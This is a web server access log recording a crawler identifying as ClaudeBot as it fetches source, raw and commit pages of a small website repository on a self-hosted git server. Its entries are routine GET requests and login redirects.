"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fproxy-host-4_access.log" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fproxy-host-3_access.log" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 9891] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fproxy-host-2_access.log" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fletsencrypt.log.1" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fletsencrypt.log.5" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fletsencrypt-requests_access.log" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fassets%2Fjs" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Contact.tsx?display=source" [Client 216.73.216.188] [Length 16520] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png?display=rendered" [Client 216.73.216.188] [Length 10866] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/About.tsx?display=source" [Client 216.73.216.188] [Length 13978] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx?display=source" [Client 216.73.216.188] [Length 16531] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services/geminiService.ts?display=rendered" [Client 216.73.216.188] [Length 10943] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png?display=rendered" [Client 216.73.216.188] [Length 10866] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Hero.tsx?display=source" [Client 216.73.216.188] [Length 13922] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Footer.tsx?display=source" [Client 216.73.216.188] [Length 14256] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fproxy-host-1_access.log" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/About.tsx?display=rendered" [Client 216.73.216.188] [Length 10946] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Footer.tsx?display=rendered" [Client 216.73.216.188] [Length 10945] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Contact.tsx?display=rendered" [Client 216.73.216.188] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx?display=rendered" [Client 216.73.216.188] [Length 10956] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Hero.tsx?display=rendered" [Client 216.73.216.188] [Length 10943] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.gitignore" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx?display=rendered" [Client 216.73.216.188] [Length 10953] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx?display=rendered" [Client 216.73.216.188] [Length 10952] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx?display=rendered" [Client 216.73.216.188] [Length 10945] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx?display=rendered" [Client 216.73.216.188] [Length 10949] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx?display=rendered" [Client 216.73.216.188] [Length 10950] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 216.73.216.188] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 216.73.216.188] [Length 10894] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 216.73.216.188] [Length 10899] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fassets%2Fimages%2FControlRoom5.png" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:07 +0000] - 200 200 - GET https 